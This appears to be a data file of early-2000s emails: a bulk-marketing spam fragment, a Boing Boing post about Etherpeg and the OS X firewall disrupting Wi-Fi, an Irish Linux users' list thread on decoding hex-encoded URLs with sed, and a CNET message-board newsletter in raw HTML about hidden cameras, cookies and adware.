 \tab \tab &lt;a href=3D"http://www.bti-marketing.com/rmill.html"&gt;Check it out=
 &lt;br&gt;&lt;BR&gt;
 \tab \tab \tab &lt;br&gt;&lt;BR&gt;
 \tab \tab \tab &lt;br&gt;&lt;BR&gt;
 \tab \tab \tab &lt;br&gt;&lt;BR&gt;
 \tab \tab &lt;/a&gt;&lt;/b&gt;&lt;/p&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;p&gt;The sender of this message has stated its assurance that the sender com=
 plies with all state guidelines and codes regarding UCE. This transmittal =
 is specifically not intended for residents of the state of Washington. If =
 you wish to opt out of receiving of this message in the future, please &lt;ht=
 ml&gt;&lt;a&lt;BR&gt;
 href=3D"http://www.bti-marketing.net/remove.html"&gt;click here&lt;/a&gt;&lt;/html&gt; an=
 d enter your email address. Thanks for your positive assistance.&lt;BR&gt;
 &lt;/html&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;/FONT&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Don't do the brown WiFi, the brown WiFi is BAD
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85515860
 Date: Not supplied
 Rob "Pringles Can" Flickenger and others at the O'Reilly OS X con have tracked 
 down the cause of the annoying flakiness in the wireless network here -- every 
 20 or 30 seconds, you start getting "connection refused" messages from your 
 browser and other net-utilities. 
 It turns out that running the great network-spy app Etherpeg[1] (or other 
 "promiscuous" network sniffers) and the built-in firewall in OS X at the same 
 time causes your computer to begin intercepting every packet sent out on your 
 segment of the wireless network and respond to it with a "rejected" message. 
 So today, Rob (and everyone else who knows about this) is going to run around 
 and tell people running Etherpeg to _turn off the firewall_ (and vice-versa). 
 Ah, fickle networking, you are such a stern mistress! Link[2] Don't do the 
 brown WiFi, the brown WiFi is BAD (_Thanks, Rob!_)
 [1] http://www.oreillynet.com/pub/wlg/1414
 [2] http://www.oreillynet.com/pub/wlg/2086
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] converting strings of hex to ascii
</t>
  </si>
  <si>
    <t xml:space="preserve">David Neary wrote:
 &gt; Padraig Brady wrote:
 &gt; 
 &gt;&gt;&gt;Paul Jakma wrote:
 &gt;&gt;&gt;
 &gt;&gt;&gt;&gt;chars in hex to plain ASCII?
 &gt;&gt;&gt;&gt;
 &gt;&gt;&gt;&gt;eg given
 &gt;&gt;&gt;&gt;   http://w%77%77%2Eo%70%74%6F%72%69um.n%65t/remove.html
 &gt;&gt;&gt;&gt;
 &gt;&gt;&gt;&gt;is there an easy way to turn it into
 &gt;&gt;&gt;&gt;
 &gt;&gt;&gt;&gt;   http://www.optorium.net/remove.html
 &gt;&gt;&gt;&gt;eg, whether by piping through some already available tool, or 
 &gt;&gt;&gt;&gt;programmatically (printf? - but i dont see how.).
 &gt;&gt;&gt;
 &gt;&gt;Actually the following would be in some way sensible:
 &gt;&gt;echo -e "`echo "$enc" | sed 's/%\([0-9a-fA-F]\{2,2\}\)/\\\x\1/g'`"
 &gt; 
 &gt; 
 &gt; Why {2,2}? Why not {2}?
 Me being silly, that's all.
 Pdraig.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CNET: Miniature cameras and privacy laws
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;Message Boards Dispatch&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;center&gt;
 &lt;a href="top"&gt;&lt;/a&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 &lt;tr valign=top&gt;
 	&lt;td width=442 colspan=4&gt;
 		&lt;img src="http://www.cnet.com/i/nl/mb/hd.gif" width="442" height="60" border="0" alt="CNET Message Boards Newsletter"&gt;&lt;br&gt;
 			&lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;
 				&lt;tr&gt;&lt;td bgcolor="#000000" colspan=3&gt;&lt;img src="/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td bgcolor="#000000" width=1 rowspan=2&gt;&lt;img src="/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;td width=10 rowspan=2&gt;&lt;img src="/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;td  width=430&gt;&lt;img src="/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
       		&lt;/table&gt;	
 	&lt;/td&gt;
 &lt;!-- Skyscraper column --&gt;
 	&lt;td width=160 rowspan=2&gt;
 		&lt;img src="http://a.r.tv.com/cnet.1d/i/dp/dd_b.gif" width="160" height="18" border="0"&gt;&lt;br&gt;
 		&lt;table cellpadding=0 cellspacing=0 border=0 width=160&gt;
 		&lt;/table&gt;
 &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;p&gt;
 &lt;!-- search form --&gt;
 &lt;table cellspacing=0 cellpadding=0 width=150 border=0&gt;&lt;form method=get action="http://www.search.com/redirect"&gt;
 &lt;tr valign=top&gt;&lt;td&gt;&lt;font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value="http://xlink.zdnet.com/cgi-bin/texis/forums/forums/search.html/+/cnet/?Utext=%%q%%&amp;subcat=&amp;cobrand=cnet&amp;template=cnetnt&amp;Usch=5&amp;ROS=1"&gt;Messages
  &lt;option value="http://cnet.search.com/search?tag=ex.messageboards.dispatch.srch.cnet"&gt;All CNET
  &lt;option value="http://www.search.com/search?tag=ex.messageboards.dispatch.srch.web"&gt;The Web
 &lt;/select&gt;&amp;nbsp;&lt;input type=submit value="Go!"&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/form&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- /search form --&gt;
                 &lt;!-- Top 10 Forums --&gt;
 				&lt;img src="http://www.cnet.com/i/nl/mb/rhc_top10.gif" alt="More Forums" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="150" border=0 cellpadding=2 cellspacing=0&gt;
 				&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;1. &lt;a href="http://clickthru.online.com/Click?q=68-iM8qIsPWu8nxIpSywvjsK-FdLP4R" &gt;Wireless&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;2. &lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLWMEosNOrUywq2NRJSBTeR" &gt;Computer Help&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;3. &lt;a href="http://clickthru.online.com/Click?q=92-ubRVQTzF9IE_HtDzeFOPq1FsnysR" &gt;Speakeasy&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;4. &lt;a href="http://clickthru.online.com/Click?q=a7-fR_2Q8BskD07vxoLF5vLk7KCgFZR" &gt;Windows 98&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;5. &lt;a href="http://clickthru.online.com/Click?q=bc-zkPJQ6BMunEryF0mobF8XEDxwcdR" &gt;PC Hardware&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;6. &lt;a href="http://clickthru.online.com/Click?q=d1-ulOzQpEQ0CYH6dm10-kl0aSxkZcR" &gt;Windows Me&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;7. &lt;a href="http://clickthru.online.com/Click?q=e6-qG8rQwy7yD7BdrPXGugH6NQYvURR" &gt;Computer Newbies&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;8. &lt;a href="http://clickthru.online.com/Click?q=fb-aWErQkg7jGWzcA_oFokcTbTDoVFR" &gt;Downloads&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;9. &lt;a href="http://clickthru.online.com/Click?q=10-YU9qI9Ns0-9GH5BPffACEH5fCA9R" &gt;Windows XP&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;10.&lt;a href="http://clickthru.online.com/Click?q=26-KqPVIiMxelsWwSsBBBkqU8niQ7RR" &gt;Virus &amp; Security&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 				&lt;!-- /Top 10 Forums --&gt;
  				 &lt;br&gt;
 				&lt;!-- Hot Products --&gt;
 				&lt;img src="http://www.cnet.com/i/nl/mb/rhc_hot.gif" alt="Hot Products" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="100%" border=0 cellpadding=3 cellspacing=0&gt;
 				&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 				Check out the User Opinions on these Hot Products and then submit one of your own.&lt;br&gt;
 				&amp;nbsp;&lt;br&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 				&lt;font color="#CC000" size="-2"&gt;84%&amp;nbsp;&lt;/font&gt;&lt;img src="http://download.cnet.com/images/tu.gif" width=14 height=17 border=0 alt="User Opinions"&gt;&amp;nbsp;&lt;font color="#333333" size="-2"&gt;16%&lt;/font&gt;&lt;img src="http://download.cnet.com/images/td.gif" width=14 height=17&gt;&amp;nbsp;&lt;font size=-2&gt;(19 votes)&lt;/font&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=3b-XhxVINdxKv3IEoyFPcZsjpRp-LFR" &gt;Sony DCR-TRV50 
 &lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Electronics: Camcorders&lt;/font&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 				&lt;font color="#CC000" size="-2"&gt;94%&amp;nbsp;&lt;/font&gt;&lt;img src="http://download.cnet.com/images/tu.gif" width=14 height=17 border=0 alt="User Opinions"&gt;&amp;nbsp;&lt;font color="#333333" size="-2"&gt;6%&lt;/font&gt;&lt;img src="http://download.cnet.com/images/td.gif" width=14 height=17&gt;&amp;nbsp;&lt;font size=-2&gt;(2878 votes)&lt;/font&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=50-M_CBIR0cwZMiArtASOnO8CtmMg4R" &gt;Ad-aware&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Downloads: System Utilities&lt;/font&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 				&lt;font color="#CC000" size="-2"&gt;77%&amp;nbsp;&lt;/font&gt;&lt;img src="http://download.cnet.com/images/tu.gif" width=14 height=17 border=0 alt="User Opinions"&gt;&amp;nbsp;&lt;font color="#333333" size="-2"&gt;23%&lt;/font&gt;&lt;img src="http://download.cnet.com/images/td.gif" width=14 height=17&gt;&amp;nbsp;&lt;font size=-2&gt;(263 votes)&lt;/font&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=65-K82zIDP9dgcNRKtD70VOf0m8P9eR" &gt;Guard-IE Ad Blocking Privacy Suite and Popup Killer&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Downloads: Online Privacy&lt;/font&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=7a-EE_AIPB8prSf1Y-hU6coezkBZXyR" &gt;&lt;b&gt;More User Opinions&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 				&lt;!-- /Hot Products --&gt;
 &lt;!--Tech24 promo--&gt;				
 &lt;TABLE WIDTH="136"  CELLSPACING="0" CELLPADDING="0" BORDER="0"&gt;
 &lt;TR&gt;&lt;td&gt;
 &lt;div align="center"&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;b&gt;Computer Problems?&lt;/b&gt; Try our Live Support from a Live technician!&lt;/font&gt;&lt;/div&gt;
 &lt;/tR&gt;&lt;/td&gt;
 &lt;/table&gt;
 &lt;STYLE&gt;
 	.black {color: #000000; font-family: Verdana, Arial, Helvetica, sans-serif; font-style: normal; font-size: 11px; font-weight: normal;}
 &lt;/STYLE&gt;
 &lt;SCRIPT LANGUAGE=javascript&gt;
 &lt;!--
 function clearTextarea() {
 	if ((document.QuestionEntry.Question.value == "Type here and click go.")) {
 		document.QuestionEntry.Question.value = "";
 	} else {
 		return;
 	}
 }
 //--&gt;
 &lt;/SCRIPT&gt;
 &lt;form method="post" action="http://www.tech24.com/process/QuestionRedirect.asp" name="QuestionEntry"&gt;
 &lt;input type="hidden" name="Partner" value="Tech24CNet"&gt;
 &lt;input type="hidden" name="Portal" value="Tech24CNet"&gt;
 &lt;TABLE WIDTH="130" BORDER="0" CELLSPACING="0" CELLPADDING="0" CLASS="black"&gt;
 	&lt;TR&gt;
 		&lt;TD WIDTH="220" COLSPAN="3" VALIGN="top"&gt;&lt;IMG SRC="http://www.tech24.com/images/cn_01.gif" ALT="" WIDTH="130" HEIGHT="64" BORDER="0"&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD WIDTH="2" VALIGN="top" BGCOLOR="#000000"&gt;&lt;IMG SRC="http://www.tech24.com/images/transpar.gif" WIDTH="2" HEIGHT="1" ALT="" BORDER="0"&gt;&lt;/TD&gt;
 		&lt;TD WIDTH="126" ALIGN="center" VALIGN="top" BGCOLOR="#F0F2E4" CLASS="black"&gt;
 		&lt;BR&gt;&lt;textarea name="Question" cols="11" rows="3" wrap="virtual" onFocus="clearTextarea()"&gt;Type here and click go.&lt;/textarea&gt;
 		&lt;BR&gt;&lt;BR&gt;&lt;input type=image src="http://www.tech24.com/images/go.gif" value=submit name=submit border=0&gt;
 		&lt;BR&gt;&lt;IMG SRC="http://www.tech24.com/images/transpar.gif" WIDTH="126" HEIGHT="1" ALT="" BORDER="0"&gt;&lt;/TD&gt;
 		&lt;TD WIDTH="2" VALIGN="top" BGCOLOR="#000000"&gt;&lt;IMG SRC="http://www.tech24.com/images/transpar.gif" WIDTH="2" HEIGHT="1" ALT="" BORDER="0"&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD WIDTH="220" COLSPAN="3" VALIGN="top"&gt;&lt;IMG SRC="http://www.tech24.com/images/zc_04.gif" ALT="" WIDTH="130" HEIGHT="9" BORDER="0"&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;!-- /Tech24 promo--&gt;				
 &lt;!-- promo section --&gt;				
 	&lt;/td&gt;
 	&lt;td width=9 rowspan=2&gt;
 		&lt;img src="http://www.cnet.com/i/dp/dd_c.gif" width="9" height="60" border="0"&gt;&lt;br&gt;
 		&lt;table width=9 cellpadding=0 cellspacing=0 border=0&gt;
 			&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;tr&gt;&lt;td bgcolor="#ffccoo"&gt;&lt;img src="/b.gif" width="9" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;		
 	&lt;/td&gt;
 	&lt;td width=1 bgcolor="#000000" rowspan=2&gt;
 		&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 			&lt;tr&gt;&lt;td bgcolor="#eeeeee"&gt;&lt;img src="/b.gif" width="1" height="60" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;		
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr valign=top&gt;
 	&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;td width=10 bgcolor="#ffcc00"&gt;&lt;img src="/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;td width=430 bgcolor="#ffffff"&gt;
 		&lt;table cellpadding=0 cellspacing=0 border=0 width=430 bgcolor="#ffffef"&gt;
 			&lt;tr valign=top&gt;
 			&lt;td width=10&gt;&lt;img src="/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td width=412&gt;
 			&lt;table cellpadding=8 cellspacing=0 border=0&gt;
 				&lt;tr&gt;&lt;td&gt;&lt;font face="Arial, Helvetica" size="-2"&gt;July 18, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;/table&gt;
 				&lt;table cellpadding=0 cellspacing=0 border=0 width=412&gt;
 				&lt;tr valign=top&gt;
 					&lt;td width=10&gt; &lt;/td&gt;
 					&lt;td&gt;&lt;font face="Arial, Helvetica"&gt;
 						&lt;font color="#333333"&gt;&lt;B&gt;Dear Readers,&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 						&lt;font size="-1"&gt;I'm sure you've seen those annoying X-10 cameras ads popping up left and right while surfing the Internet. One day, out of curiosity, I decided to check this bothersome company's Web site. To my amazement, I found that their miniature cameras are pretty darn tiny, and you can mount them practically anywhere. But what does the law says about using them? I wouldn't want anyone to invade my privacy with that sort of camera setup. Coincidentally, I ran across this interesting discussion about this in the Boards, where members were discussing these &lt;a href="http://clickthru.online.com/Click?q=8f-OOYvQ8KJgWw6CowXvsg9tyQFWvZR" &gt;miniature cameras&lt;/a&gt;, called CCTVs, and the privacy concerns around them. So if you want more info or would like to leave your two cents' worth about this, send us a post. Besides, this information might keep you from getting caught on camera in an embarrassing situation. 
  &lt;/font&gt;&lt;br&gt;&lt;br&gt;
 						&lt;font face="arial, helvetica" size="-2"&gt;
 						&lt;table cellpadding=0 cellspacing=0 border=0 width=55 align=left&gt;
 						&lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Promos/mb_0503_pushpin_pg.gif" width="50" height="50" border="0"&gt;&lt;/td&gt;&lt;/tr&gt;
 						&lt;/table&gt;
 						Lee Koo&lt;br&gt;
 						CNET Community&lt;br&gt;
 						Got suggestions? Email me: &lt;a href="mailto:messageboards@cnet.com"&gt;messageboards@cnet.com&lt;/a&gt;&lt;/font&gt;&lt;br&gt;&lt;br&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;/table&gt;
 			&lt;/td&gt;
 			&lt;td width=8&gt;&lt;img src="/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;/tr&gt;
 			&lt;/table&gt;
 	&lt;!-- bottom rule --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
 	&lt;tr valign=top&gt;
 		&lt;td bgcolor="#F7D69C"&gt;&lt;img src="/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;table cellpadding=10 cellspacing=0 border=0 width=430&gt;
 &lt;tr&gt;&lt;td&gt;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href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZFS_ffQGvsIC1b2OB8OEuR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/pg/021502_pointcamera.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=ba-m-45QXpJTW-8XkTxhOmI_uIUEksR"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href="http://clickthru.online.com/Click?q=cf-ebM-QLw1uw7IMhWJaylIO7r3fxZR" &gt;5-megapixel shoot-out&lt;/a&gt;&lt;br /&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=e4-ABYFQVkP4jBYv85I81u0PT_Qv1dR"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href="http://clickthru.online.com/Click?q=f9-mtKTQxOPEQ9_xb2SM_svdGheo-cR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	2. &lt;a href="http://clickthru.online.com/Click?q=0e--eOTIiQIuxlESBL4r8dJx98lbKRR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	3. &lt;a href="http://clickthru.online.com/Click?q=23-sFcGINMjnMy_n5CiAv2Y9ZZvQKFR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	4. &lt;a href="http://clickthru.online.com/Click?q=38-bLkmIRM1EYfXXY_nhJiSUxuD-D9R" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	5. &lt;a href="http://clickthru.online.com/Click?q=4d--URsIKZkrpZrKTtdaB0S22bbKAeR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=62-4oBiIePOUIIJanyG9TmIKJ15BRyR"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&lt;a name="ThisweekinCNETMessageBoards"&gt;&lt;/a&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
 	&lt;tr valign=bottom&gt;
 		&lt;td width=75&gt;&lt;img src="http://www.cnet.com/i/nl/mb/sub_thiswk.gif" width="290" height="19" border="0" alt="Simple Questions w/Simple Answers"&gt;&lt;br&gt;&lt;/td&gt;
 		&lt;td width=335&gt;&lt;font face="arial, helvetica" size="-1" color="#660000"&gt;&lt;b&gt; &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan=2 bgcolor="#cccccc"&gt;&lt;img src="/b.gif" width=1 height=1&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan=2&gt;&lt;img src="/b.gif" width=1 height=8&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 			&lt;font face="Arial, Helvetica"&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;Cookie, anyone?&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;No, not the chocolate-chip type, but small data files that are written to your hard drive by some Web sites when you view them in your browser. So what are the benefits of cookies? Are they harmful? Can I get rid of them without messing up my computer? These and many other cookie questions are answered in these two discussions, so if you're curious, bite into it and find out more. 
 &lt;ul&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=78-d5asIdUkHp8KE5u5vnMUN5xspo4R" &gt;To delete or not to delete cookies...your choice&lt;/a&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=8d-nbL1Q7nmvyTogUvIiSupcptbPMuR" &gt;Deleting cookies and keeping them off my computer&lt;/a&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=a2-6-M7QXZHFgGTY-D9R0CGk_HtsosR" &gt;More Computer Help discussions&lt;/a&gt;&lt;/ul&gt;&lt;/font&gt;&lt;p&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=b7-FOgPQ8JHO5rm1qg0NpbnpTbdL3ZR" &gt;My browser home page gets hijacked every time!&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;Have you ever checked out a Web site only to find that the home page on your Internet browser had been hijacked by it and you can't change it back? This happened to one member. Fortunately for him, the expert advisor of the forums was there for his rescue. Take a look at how he and others solved the problem. &lt;a href="http://clickthru.online.com/Click?q=cc-h4fQQ0O79aGXCqa7qeZDozn6f5dR" &gt;More Computer Newbies discussions&lt;/a&gt;
 &lt;/font&gt;&lt;p&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=e1-6RvNQxk1PgLkwxdPhsYK3Awi9qcR" &gt;Pop-up ads, begone!&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;If you've downloaded some software in the past and noticed an unreasonable amount of pop-up ads, you may have picked up unauthorized software that serves pop-up ads while you surf. This can be pretty frustrating and annoying. Find out here about these unauthorized attachments and how to get rid of nasty pop-up ads.
 &lt;ul&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f6-QktIQMwQkvTXPxTYYRGOT9_JmpRR" &gt;Removing Gator junk from my PC&lt;/a&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=0b-0NI-INQaMc92V0QGftmZCtvxYhFR" &gt;More Security and Virus Alerts discussions&lt;/a&gt;
